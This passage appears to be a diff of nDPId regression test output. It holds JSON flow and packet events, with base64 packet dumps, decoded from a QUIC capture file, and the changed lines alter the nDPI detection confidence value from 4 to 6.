4XUTA2SbApAP2UYTQPidrIUUsyN9OEN+6zFcRKwBgiXUg0JDK+e1z3gz3W745d\/sI1uFMBbzhwnhKRBQCTyj6OoDAeCCoqL11AGEcZlyCkzwplqlHqv3BulzvKXdH9fy+hypwspz5JB3rBva7abdmpAfrNWtysCkoMbDEsi+BH9Sw\/WfI\/JW43OziRxWE0b\/6GaLLm0LPRqG0ta2a+8bSNrTX8mMiYpr81yyeAJGf+3SLq39ywLsaDDH+SnGlydZPTKaT5dEVTmOUfwB8TyliRH7r2g\/e8Jo89ZNHbaMlGDbYtZHnJ\/oXmkMMX0TtfMqSbUAI13SGw0x0yqJUBVeqWXi6nCYIEoougf\/rRSL7RNh\/DgbwKlBhtRbBjEQ\/fei4q7M4c5UJkO+skPmmiMvYCQhOGRb6M75LAcuzVGQ8XTpzS4Q49h3haLUT7LCYbVjfGyqoeek1PufbtNM7RA9oB6986rRvq1HME2Qh77x8xxPIkwZHbkxc\/bKYMzPnJ2UeHA+V+TItjasVAOkyFvBZpJobZJOx5lM+v4cwtiH2ykJPHJYMbL8uQhYq741WaUualB49TABJ2lncw6tGeQpg0Oc\/Ffn7jPYQNW8CiZh2MKru7wG5Af2I7ggRC0CDFHJi4CcaHMbjEL8xmaCoe7kEiBjZVMpQq8yq8HDVmX6xuiwGFbSpnmw7737hgdBgSQgsmzZ+eyRAnkDX7sSqv9hCS0Zcb3DoP4XMm+5jI\/u\/CnNPitv0yoNrGp5yiS0Bb3cyT9aVQMRpm5+oM6J8FgVTuiAzbLFQfG28vM2HH6RzkRHWgAdyYhr1dpw2Zy7iTAPNVWd1SULG1vIgBDQMenfFa7JoTVJsPivxw59Fc6nxyGVmp7UaHrhQVYqlLcKnPC62iMBiWrPAYZFn5ijxczxoNDc6ynoTmgTnNCK4rH5wD4cRLasJRPJwZqqD20+m0sIXMeyDt2b+cU4j\/UFP20j2zVAVzNgz5C8yIdFJDfygcCX1uMo4LGqi5N+2qh3+XEDAJQkfWgO2sWhpJa\/W6mNUejnWaDgkXgNbiL8BtuKDTdIalY78bJmkO8h2Cl7UuEPHZbPJY1CNBXdiCdtfcR\/\/69FKUtxyHLd44Txaub7ezT8XT\/2j1TO5ZpJK2c9CQslposHRZIXcQpmszsY7beFygv4KRpcCyDhjXHdoMk4Cx6Zf322ZH0visL\/1\/gL4MdUJwQBy3KCD2JhsiDqFkE3JPopsXvIIsTgN2itT8qn30ZnTFxpcPjawKM8R8YmcFcSfJXzy9S4n3fG5zVGgQhv+APAzodhVQyyG6paPspPsNKi3e6pZse6mfJbU+RHKTdtZrGwzhUbQsLxNpwTzdCArEwHBFERYdg28g2amHvk3VyhEJlMpWUR4CasyIc0tQUYMkJaCUUlS0aWSy5Tnhj9mf3ScVUNZtHYvoFQgMdxMVZR0ICCfvHTrO6AtY5\/AI2NI8kYvvIj5Qw+wIOEUvx1PjAGLWbH4JzLOrTxTHK"} -00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621434024831,"flow_last_seen":1621434024831,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621434024831,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"185.186.183.185","src_port":60949,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"content-autofill.googleapis.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621434024831,"flow_last_seen":1621434024831,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621434024831,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"185.186.183.185","src_port":60949,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"content-autofill.googleapis.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621434304066,"flow_last_seen":1621434304066,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621434304066,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"137.238.249.2","src_port":57735,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1621434304066,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621434304066,"pkt":"AAAAAAAAAAEA4PSECABFAAViGypAAH4RcNqokEAFie75AuGHAbsFTmxnxP8AAB0I6APGIi8XMbMANwAf+\/1CDYfNSqZV6JuY2eU0m84t1CHbeC6cE\/+erbLQOHtC\/LsGzIyDeeVGEgpwCWPVi+MQCnZE\/Ygc2mi4SLeix+8TnlYUcEJa7kzg6S+7lKmfSMXvMlPqpt8Jqhul99eiai\/CwIIhzgiuj7qKQafo1JRj2kBZbTRDU1+SZHOQN7e5Nj19ARXzRQ1f1x+ihAp61tvIBTDRPDLXc1ubHgvyinj5MfnF\/12s5SMxBHDDCXN3NmqXQxAS4MECv72MUs94PMpz9zGUL5LHUzGHAIbclxnzN7sHd1go4+lLCWey570KhMF8PzFiMw5ory1Vew4LX22LtMy2jvvM1vnDE1crnUnJCzQDcgJHDiRsasjBdtp7HdISribAOc8CB2obB0oyyA5X8m4qhy5s84s74KgzXgyxL59PIeQSEcVb59yBdZjMcyXXJ80CrHVTLXNi4PQyHnn48osYeAyUn8yU3VqEWwgftLAi39oJlXsQyCTXsKmuL7OB7gY7Vuai77q03lFhqfHaX9cLtEypQIWNB2r\/l2ALpr13EuKe2oyXGUuf78i9rQmSYgbO4A4y3MRD\/QqZXl\/77HpSb03kGClkTea21fqnpJT\/zJSYfPYFvCXBYWmiAW9wMzLsKUQeqeHCc1gL7imhRXQ4PrR2LeuOgoR5+fRtqAenht6XH9lUHNUo32hs\/wjLrrHX9gnX1hALWGhcNyMLvpFTjI5tPVKkRbNv5c3mJilmNWHxhjVHpnhQDdE3xh\/NfcCROvsyq5m28OWLWcPE2FvU5KBMY6t0tV0A4eoef29jjCAjLO\/M8mpZb7ujaK\/6H5Re8VFYbLmxdrQraYtMIxWND\/984VqRyFoxBrQh6ygpK33dCrOTNkgS2NHt4BbEN3kBlcM\/dJxkQlX\/WhjdaU\/jKdtFt12Kk5gsUCyahX7xPzli0x1FX\/Q6DmOvGVlWQmKwwBBrReFKQe+WYt51ygXzik317+tRLkmZwIN6Nf5C1O+PyUMA7NiOjHZECt9SxgRFTLngwK\/BOvB+tJVNrOjrc5ouhUeeMBFLaijzDUDK1PsEMcF3KYI4t\/ROzLfqLIxLRK+vFjZLKp8b\/lca3pPTeuTvHMH9GjJ0X9j4ISArXi3WDjwMH\/Ow1fIn6CTlfV8aDmzMvW0v9ZGuQXxYq3FVxoJ6jyGNfEJzY+Tal8doePa4R1YqwbnqHBlxYcCHiNxYcJir\/3tIthYf6C7p1vYTQ0q9zzsSi9ab+onOdI4XXVybeJLwUU0vgi23+ITCo5zV6ESOFAjb+YSOsYgwePhG2z0W6PMf7nvnuMEzAy1AOgdBeakrjggSIvTuM3izkIHo3vfWd9R+DyKdj7JlM\/HRJmVAHwQIB+FHDGPxLbMFK9o+C4TYA4LeNTQ2YMqk6y7D+GRumXbZ\/9OD7PDPvEuiASsqlgc7rtO5TmRCZno3ukk8JNtthovwosB91+YQlqUUew2kq+cJr8mtfNeNdB4fYgAJJqJbMWJd6QOv52uYyuvINUeitOOi64uHklHkyRistUgemwXXe7otvzQLzpEQlEHAtTBMiKoZve\/eJFLoSA8M6gHeOxwAnJqUrU74jdXSt1xL+HU2Hynt8\/YtqB6Ky+qMw0VdxI8dMW6f6iKuz3JMrpbMCfeILC76cPYJAI0R1JC+ZQwx6QeScq+kiLVZZk4THRZ2H5yZznb9iTrWTpZBeU0\/nsuUhcsqOtw38xuyp6cqnniKTRwy7qgYC9\/RKw732DLUQ1HhQkZ5LproX0hXWsSSQ8AXfC29DpYL"} -00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621434304066,"flow_last_seen":1621434304066,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621434304066,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"137.238.249.2","src_port":57735,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"ade.googlesyndication.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} -00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":74,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433848159,"flow_last_seen":1621433848159,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621434304066,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":59680,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} -00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":74,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433861442,"flow_last_seen":1621433861442,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621434304066,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"217.254.108.174","src_port":57565,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} -00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":74,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621434024831,"flow_last_seen":1621434024831,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621434304066,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"185.186.183.185","src_port":60949,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} -00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":74,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433861875,"flow_last_seen":1621433861875,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621434304066,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"143.52.137.18","src_port":52387,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} -00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":74,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433949433,"flow_last_seen":1621433949433,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621434304066,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":49860,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"}} +00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621434304066,"flow_last_seen":1621434304066,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621434304066,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"137.238.249.2","src_port":57735,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"ade.googlesyndication.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":74,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433848159,"flow_last_seen":1621433848159,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621434304066,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":59680,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} +00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":74,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433861442,"flow_last_seen":1621433861442,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621434304066,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"217.254.108.174","src_port":57565,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":74,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621434024831,"flow_last_seen":1621434024831,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621434304066,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"185.186.183.185","src_port":60949,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":74,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433861875,"flow_last_seen":1621433861875,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621434304066,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"143.52.137.18","src_port":52387,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} +00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":74,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433949433,"flow_last_seen":1621433949433,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621434304066,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":49860,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"}} 00602{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":74,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":74,"packets-processed":73,"total-skipped-flows":0,"total-l4-payload-len":98550,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":61,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":61,"total-idle-flows":60,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":263,"global_ts_msec":1621486316206} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621486316206,"flow_last_seen":1621486316206,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621486316206,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":50588,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02306{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1621486316206,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621486316206,"pkt":"AAAAAAAAAAQAJ0huCABFAAViZWtAAH4R2n40uxSv0OWdUcWcAbsFTrOSyf8AAB0I+xTa7lKQafkAAEU0jTWyhjWmo3c2c8tkYAeIRC00J2hfh\/j02rOWVtYboU9UivrOMDnb4DlblCS28uJrMkjjwdTtO22vVFwPaYxj2IIflFADqJCdVuHcXcnvIynZuH\/49aoZoAl2YJS8pUl6yCn3zcPhaVYM3BWJHJ12bT\/rBl+QUhFz+eNv1NjusSyo7XRmUXDT9LZCM\/KsdcUeJxbJMKMhLKDH81GMtpYCHwWUPWqqO9e9hvA+yFxWoDib4NbLv3\/NPWniDKh36sKuVx\/WIkOp5AaTQLzBliiDDxtF80Iy3ba1w3uKH81kscAY6jISZDkCGIpkH83a9jbwNNTu4dDGSDZa7\/6HH5W20Tq4MhhXWYZTT\/8h1Oy0puUFllXhqXmIg8+2Grn5B+DCtffivNTxawD23zhZYDMa5O4Knv1pxKsoCPI9uGjVARZ4WxoinnBJ4Lx\/eivjiy\/9wUiLC2t3yBsy7scxzTv7a9B56haRYFOHLBvLzNjV2ReQFucDRZ194sZlbUdGn8MFTzauGKyE8FjTABrbToSZZkd+s9mIdwH35yLr658ZiMm1iQSdaUX3AcvdyYuEGp8MnQAMvaoRfRnnmkSaFBBjiB2OIsBm5yjfjQzpYtX97hEeUwSv5yqk9ySGiUJXi\/5hLfad84l42JzVEw9YlxyakiWEDTCs6mdaMom7vY\/Iha1i3AZ8pf3WkhBJ3b2\/2DKVs0REkOZgjTqzdd\/K4AfSFcDL8A1CiF09bQ+eTVXaS+xpmL5GSTVDyTRM40KZfUhO\/T9EQZtNPiniyNqbtSZp2BYc+\/2l9wdhMEjiEKO6wYoSeRFPJBNsw+m7Su\/ssmDRlXGBnVI6tlHZWM7CBp7yEtJ+9b5lh\/h2b6o8NLXzXZmB94SFM5zpx3nqn4s+YimdYWtGhQxRDQoKolK3iglu1GOcgjHmAJkQjEjCoXuY5Z3wxhAtlHkChB4D4Sj+Mo0Pe8PuHQ3hvPSuLwFw0FqDm7Rspzd6alV6wevE9brqF0ttPmCgs8akAeLH3Hg2jOzJR7Zq8KSRDJyhC5wYRQJomZdHmhVl6k0hQlrOPsbeG33RJrOXASmtURkVNrkqMFtEbzD+nJJcxlWpn49Ehl9m2kKOIs1drmrTjCgOrpMNceU36z6U7NKS4u4a1hVFTMi1YV9BCf0SrTjGuouERb51jAiRXHvLt9eC3HlqplhkgSDMr8ATClK+9EeI5ZYJ+qwQ1oNpZdKQHsnK3rftNgPnZFIeVe2LSvMENi8FH6YjUWMcIEMIxUvHXWmhFLzwRkjM\/dETZG8LtSp9lIP+R6o2M+Z0pn4VC09fNocjGnGygpS8xtImvQ9Xi52Wji0Mxqp\/ox1cXlDhElkji1gScwsWqwExhfJEHyZrsxDoSgYL92Z1Pn4HBsnIkQM7VPxnWWnZFJ2LkCfQ6AL5v6LxfRd1eQDzaT8j2cXS+hAnjFgH8roiknWfHzSVGVNaIySwi6GzicPRwiTXqCSzzyJiRjY7LO2cY4SJmX6FqWWTL2hOvjoCvsVA2cZN1um+uHaF8+jCaYrlDihaV62byo0sQX49iEOMQc4cm5w+ac672idPEvZbXjaLZaKlnjbEhQJQMWC\/nDrqdHevi8VXVL66zosdlIzNI74mdhJfTd8oc2ovgBinEH9PA2Lqf8or\/1dRozLWj6+nG686ciLUDqT0aDB8JAQ3nq+eUFn83ml\/py\/lqV4T0XXeWonhVytFKd1udnPL0depml6Dv31txugFaXuB9swFjUHsdQbAqQI4U08c1YRaBctk"} -00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621486316206,"flow_last_seen":1621486316206,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621486316206,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":50588,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"update.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621486316206,"flow_last_seen":1621486316206,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621486316206,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":50588,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"update.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1621486316485,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621486316485,"pkt":"AAAAAAAAAAQAJ0huCABFAAViZXhAAH4R2nE0uxSv0OWdUcWcAbsFTqeoxf8AAB0I+xTa7lKQafkAAEU02NqFlwI2X\/88ClDrDdUJKCRw\/slmHtAOwvb06+QlMjRjV0hs2aYrH3dl2vG36AHZbKvCCu+8tbZyidkId\/SwRLk\/aGUb9L+x4bKEhyji10luTyL48ncebSgio1Ylf2sP5y7qYToItoOHdM+sF4EspTkGPS58+WD5u+L5sXHLzRq6EFovw7tEFm4rXT1ncWUZsfHN3bUzi7UC\/xILKAQ258ulh3E12ZSv8bupoSOwAKHtGPJmU5UDctMjcbxM4bIIF8Y3B8utqsAN8n4iNen\/hK6bsT+7MeKDyJk8GvgeIX4qPhGkfCyzy2ZSx5In0Gj9mMFlrQlbRzQtMTQJLS9XHGrBJjKt7Kwt4iHS3C2\/ll+JnHv3jFSbkwPkaj4L9zsoUsRbA4HR60OvfubceMHwPcwpOKS\/YhEEpiSIRwK1XH4b0OZUCFWXt2vsvHXiJx7CWD5E6BOBg+ZYetFelTfuQxNgfXROtoGuJ+3wQxi2DRGnFXCHGYLoAO8i4AAIvpgGgoqzjNM1BmQvfSO\/X4dZ8fc7Fo7vdxAVJZrJXT4m2TBKFrsawVChuoJH67VOmFJS1xgFWukI7zRJtsXhN7Czc+i9T8YtKZjInSr9AVxgs0c5d\/WCQetSMLQd\/JT5oa0sx8n2J7Z2NcU99xovxV2uKz4qjrx\/Y2k6ZoB9x3f0Yg6sfXGEGo2MQD\/7z+LWRPw2gSm3FEw8jwVDd9S8o7TTxjGKX94D5vYTcchFQTfbn2HfhKqR8F1OQIlO\/wsmxlHMHBvFUjUhJiIPWRLZt9vP+JJ4qKw7nADsc3kkxPCiHPpOD07HQF+XsbdLrhdRPVrhK5WXHFkyBU\/dGYYuv1WiPzMaGJvkyCOgbXcAH3Gb5PcTDyew+MRzHK03TijcWQ+ZOoouVFzsL9ai7HJq8AhiXpNhyx1MICcuUOAIBkQWFqamjY7zI2GJ\/c8jdNXGDAcYVSSmicj+n+x1og23m\/OzzTHzOLv1hr3DJu3hQFGpKefyvQXTCQ\/t38x1oKMoJcBam+ydIiQL\/qBv8Cn9WIgDhZCWjY0H1Zu8jJgS\/pZVcJ7m1gqv0WsKI2s926YbdUCbQTSDQMHYPrbnBQU2zGsddtUkHA8smR00xItuhuXFpHntBzWrCuuKLbpV6LTA5KLTpwJmEru6UaR8hWJdlNusN0FzSumL2gnW0wHATZvtmTr71efZIP5glV9Q2+vjbPwcPmHOjEAqqO8a9LEnQ9t0G7b4NxL6vNhgV9vEOYuD\/QGqwrXjwJs\/ispzj8Z6ANFL8uKgoOlsRFn5hpE\/fEX3ckmgeLqbknqG+NWj2t9zKylkyKmSKmy\